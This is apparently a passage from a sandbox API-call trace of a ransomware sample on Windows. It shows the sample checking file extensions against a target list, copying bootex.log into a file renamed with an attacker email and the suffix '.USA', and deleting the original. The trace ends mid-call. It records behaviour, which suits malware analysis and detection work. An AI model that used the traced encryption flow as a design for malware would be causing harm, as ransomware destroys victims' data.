GetTickCount () returned 0x840d [0268.102] GetTickCount () returned 0x840d [0268.102] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.537] GetTickCount () returned 0x85c2 [0268.537] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.647] GetTickCount () returned 0x862f [0268.647] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.762] GetTickCount () returned 0x869c [0268.762] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.124] GetTickCount () returned 0x8803 [0269.124] GetTickCount () returned 0x8803 [0269.124] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.365] GetTickCount () returned 0x88ed [0269.365] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0269.817] GetTickCount () returned 0x8aa2 [0269.817] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.138] GetTickCount () returned 0x8bda [0270.138] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.289] GetTickCount () returned 0x8c66 [0270.289] GetTickCount () returned 0x8c66 [0270.289] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.786] GetTickCount () returned 0x8e4a [0270.786] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0270.953] GetTickCount () returned 0x8ee6 [0270.953] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.254] GetTickCount () returned 0x900e [0271.254] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.425] GetTickCount () returned 0x90ba [0271.425] GetTickCount () returned 0x90ba [0271.425] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.765] GetTickCount () returned 0x9211 [0271.765] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0271.915] GetTickCount () returned 0x929d [0271.915] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.028] GetTickCount () returned 0x931a [0272.028] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.251] GetTickCount () returned 0x93f5 [0272.251] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.489] GetTickCount () returned 0x94df [0272.489] GetTickCount () returned 0x94df [0272.489] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0272.699] GetTickCount () returned 0x95b9 [0272.699] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0273.073] GetTickCount () returned 0x972f [0273.073] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0273.248] GetTickCount () returned 0x97db [0273.248] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0273.683] GetTickCount () returned 0x9990 [0273.683] GetTickCount () returned 0x9990 [0273.683] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0274.144] GetTickCount () returned 0x9b54 [0274.144] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0274.307] GetTickCount () returned 0x9c00 [0274.307] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) Thread: id = 58 os_tid = 0x678 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x584178 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x5d5de8 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b33e0 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b3798 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b33f8 [0263.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x3100020 [0263.589] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3410 [0263.589] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3410, Size=0x20) returned 0x5805d0 [0263.589] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3410 [0263.589] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3410, Size=0x20) returned 0x5805f8 [0263.589] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.589] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.589] Wow64DisableWow64FsRedirection (in: OldValue=0x2d3ff58 | out: OldValue=0x2d3ff58*=0x0) returned 1 [0263.589] lstrlenW (lpString="kernel32.dll") returned 12 [0263.589] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5805d0 | out: hHeap=0x520000) returned 1 [0263.589] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.589] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5805f8 | out: hHeap=0x520000) returned 1 [0263.589] Sleep (dwMilliseconds=0x64) [0263.741] lstrcmpiW (lpString1=".ini", lpString2=".USA") returned -1 [0263.741] lstrlenW (lpString="desktop.ini") returned 11 [0263.741] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0263.741] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=129) returned 1 [0263.741] CloseHandle (hObject=0x1f8) returned 1 [0263.741] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0263.742] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0x26 [0263.742] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.743] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.743] lstrlenW (lpString=".doc") returned 4 [0263.743] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0263.743] lstrlenW (lpString=".docx") returned 5 [0263.743] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0263.743] lstrlenW (lpString=".pdf") returned 4 [0263.743] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0263.743] lstrlenW (lpString=".xls") returned 4 [0263.743] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0263.743] lstrlenW (lpString=".xlsx") returned 5 [0263.743] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0263.743] lstrlenW (lpString=".ppt") returned 4 [0263.743] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0263.743] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.743] lstrlenW (lpString=".zip") returned 4 [0263.743] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0263.743] lstrlenW (lpString=".rar") returned 4 [0263.743] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0263.743] lstrlenW (lpString=".bz2") returned 4 [0263.743] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0263.743] lstrlenW (lpString=".7z") returned 3 [0263.743] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0263.743] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.743] lstrlenW (lpString=".dbf") returned 4 [0263.743] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0263.743] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.743] lstrlenW (lpString=".1cd") returned 4 [0263.743] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0263.743] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.743] lstrlenW (lpString=".jpg") returned 4 [0263.744] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0263.744] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.744] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.744] lstrlenW (lpString=".doc") returned 4 [0263.744] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0263.744] lstrlenW (lpString=".docx") returned 5 [0263.744] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0263.744] lstrlenW (lpString=".pdf") returned 4 [0263.744] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0263.744] lstrlenW (lpString=".xls") returned 4 [0263.744] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0263.744] lstrlenW (lpString=".xlsx") returned 5 [0263.744] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0263.744] lstrlenW (lpString=".ppt") returned 4 [0263.744] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0263.744] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.744] lstrlenW (lpString=".zip") returned 4 [0263.744] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0263.744] lstrlenW (lpString=".rar") returned 4 [0263.744] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0263.744] lstrlenW (lpString=".bz2") returned 4 [0263.744] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0263.744] lstrlenW (lpString=".7z") returned 3 [0263.744] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0263.744] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.744] lstrlenW (lpString=".dbf") returned 4 [0263.744] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0263.744] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.744] lstrlenW (lpString=".1cd") returned 4 [0263.745] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0263.745] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0263.745] lstrlenW (lpString=".jpg") returned 4 [0263.745] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0263.745] lstrcmpiW (lpString1=".LOG", lpString2=".USA") returned -1 [0263.745] lstrlenW (lpString="BCD.LOG") returned 7 [0263.745] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.745] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.745] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.745] lstrlenW (lpString=".doc") returned 4 [0263.745] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0263.745] lstrlenW (lpString=".docx") returned 5 [0263.745] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0263.745] lstrlenW (lpString=".pdf") returned 4 [0263.745] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0263.745] lstrlenW (lpString=".xls") returned 4 [0263.745] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0263.745] lstrlenW (lpString=".xlsx") returned 5 [0263.745] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0263.745] lstrlenW (lpString=".ppt") returned 4 [0263.745] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0263.745] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.745] lstrlenW (lpString=".zip") returned 4 [0263.745] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0263.745] lstrlenW (lpString=".rar") returned 4 [0263.745] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0263.746] lstrlenW (lpString=".bz2") returned 4 [0263.746] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0263.746] lstrlenW (lpString=".7z") returned 3 [0263.746] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0263.746] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.746] lstrlenW (lpString=".dbf") returned 4 [0263.746] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0263.746] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.746] lstrlenW (lpString=".1cd") returned 4 [0263.746] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0263.746] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.746] lstrlenW (lpString=".jpg") returned 4 [0263.746] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0263.746] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.746] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.746] lstrlenW (lpString=".doc") returned 4 [0263.746] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0263.746] lstrlenW (lpString=".docx") returned 5 [0263.746] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0263.746] lstrlenW (lpString=".pdf") returned 4 [0263.746] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0263.746] lstrlenW (lpString=".xls") returned 4 [0263.746] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0263.746] lstrlenW (lpString=".xlsx") returned 5 [0263.746] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0263.746] lstrlenW (lpString=".ppt") returned 4 [0263.746] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0263.746] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.746] lstrlenW (lpString=".zip") returned 4 [0263.746] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0263.747] lstrlenW (lpString=".rar") returned 4 [0263.747] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0263.747] lstrlenW (lpString=".bz2") returned 4 [0263.747] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0263.747] lstrlenW (lpString=".7z") returned 3 [0263.747] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0263.747] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.747] lstrlenW (lpString=".dbf") returned 4 [0263.747] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0263.747] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.747] lstrlenW (lpString=".1cd") returned 4 [0263.747] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0263.747] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0263.747] lstrlenW (lpString=".jpg") returned 4 [0263.747] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0263.747] Sleep (dwMilliseconds=0x64) [0263.982] lstrcmpiW (lpString1=".log", lpString2=".USA") returned -1 [0263.982] lstrlenW (lpString="bootex.log") returned 10 [0263.982] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.079] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5120) returned 1 [0264.080] CloseHandle (hObject=0x344) returned 1 [0264.080] GetFileAttributesW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 0x80 [0264.080] GetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\bootex.log.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.080] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.081] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0264.081] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0264.081] CreateFileW (lpFileName="C:\\bootex.log.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\bootex.log.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0264.089] GetLastError () returned 0x0 [0264.089] ReadFile (in: hFile=0x344, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1400, lpOverlapped=0x0) returned 1 [0264.114] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0264.115] ReadFile (in: hFile=0x344, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0264.115] WriteFile (in: hFile=0x348, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0264.115] SetEndOfFile (hFile=0x348) returned 1 [0264.115] CloseHandle (hObject=0x348) returned 1 [0264.115] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0264.115] SetEndOfFile (hFile=0x344) returned 1 [0264.115] CloseHandle (hObject=0x344) returned 1 [0264.115] SetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x80) returned 1 [0264.116] DeleteFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 1 [0264.116] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.116] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.116] lstrlenW (lpString=".doc") returned 4 [0264.116] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0264.116] lstrlenW (lpString=".docx") returned 5 [0264.116] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0264.116] lstrlenW (lpString=".pdf") returned 4 [0264.116] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0264.116] lstrlenW (lpString=".xls") returned 4 [0264.116] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0264.116] lstrlenW (lpString=".xlsx") returned 5 [0264.116] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0264.116] lstrlenW (lpString=".ppt") returned 4 [0264.116] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0264.116] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.116] lstrlenW (lpString=".zip") returned 4 [0264.116] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0264.116] lstrlenW (lpString=".rar") returned 4 [0264.116] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0264.116] lstrlenW (lpString=".bz2") returned 4 [0264.116] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0264.116] lstrlenW (lpString=".7z") returned 3 [0264.116] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0264.116] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.116] lstrlenW (lpString=".dbf") returned 4 [0264.117] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0264.117] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.117] lstrlenW (lpString=".1cd") returned 4 [0264.117] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0264.117] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.117] lstrlenW (lpString=".jpg") returned 4 [0264.117] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0264.117] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.117] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.117] lstrlenW (lpString=".doc") returned 4 [0264.117] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0264.117] lstrlenW (lpString=".docx") returned 5 [0264.117] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0264.117] lstrlenW (lpString=".pdf") returned 4 [0264.117] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0264.117] lstrlenW (lpString=".xls") returned 4 [0264.117] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0264.117] lstrlenW (lpString=".xlsx") returned 5 [0264.117] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0264.117] lstrlenW (lpString=".ppt") returned 4 [0264.117] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0264.117] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.117] lstrlenW (lpString=".zip") returned 4 [0264.117] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0264.117] lstrlenW (lpString=".rar") returned 4 [0264.117] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0264.117] lstrlenW (lpString=".bz2") returned 4 [0264.117] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0264.117] lstrlenW (lpString=".7z") returned 3 [0264.117] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0264.117] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.117] lstrlenW (lpString=".dbf") returned 4 [0264.118] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0264.118] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.118] lstrlenW (lpString=".1cd") returned 4 [0264.118] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0264.118] lstrlenW (lpString="C:\\bootex.log") returned 13 [0264.118] lstrlenW (lpString=".jpg") returned 4 [0264.118] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0264.118] Sleep (dwMilliseconds=0x64) [0264.379] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0264.379] lstrlenW (lpString="auxpad.xml") returned 10 [0264.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.379] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=212) returned 1 [0264.379] CloseHandle (hObject=0x344) returned 1 [0264.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0264.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.380] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.380] lstrlenW (lpString=".doc") returned 4 [0264.380] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.380] lstrlenW (lpString=".docx") returned 5 [0264.380] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0264.380] lstrlenW (lpString=".pdf") returned 4 [0264.380] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.380] lstrlenW (lpString=".xls") returned 4 [0264.380] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.380] lstrlenW (lpString=".xlsx") returned 5 [0264.380] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0264.380] lstrlenW (lpString=".ppt") returned 4 [0264.380] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.380] lstrlenW (lpString=".zip") returned 4 [0264.380] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.380] lstrlenW (lpString=".rar") returned 4 [0264.380] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.380] lstrlenW (lpString=".bz2") returned 4 [0264.380] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.380] lstrlenW (lpString=".7z") returned 3 [0264.380] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.380] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.380] lstrlenW (lpString=".dbf") returned 4 [0264.381] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.381] lstrlenW (lpString=".1cd") returned 4 [0264.381] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.381] lstrlenW (lpString=".jpg") returned 4 [0264.381] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.381] lstrlenW (lpString=".doc") returned 4 [0264.381] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString=".docx") returned 5 [0264.381] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0264.381] lstrlenW (lpString=".pdf") returned 4 [0264.381] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString=".xls") returned 4 [0264.381] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString=".xlsx") returned 5 [0264.381] lstrcmpiW 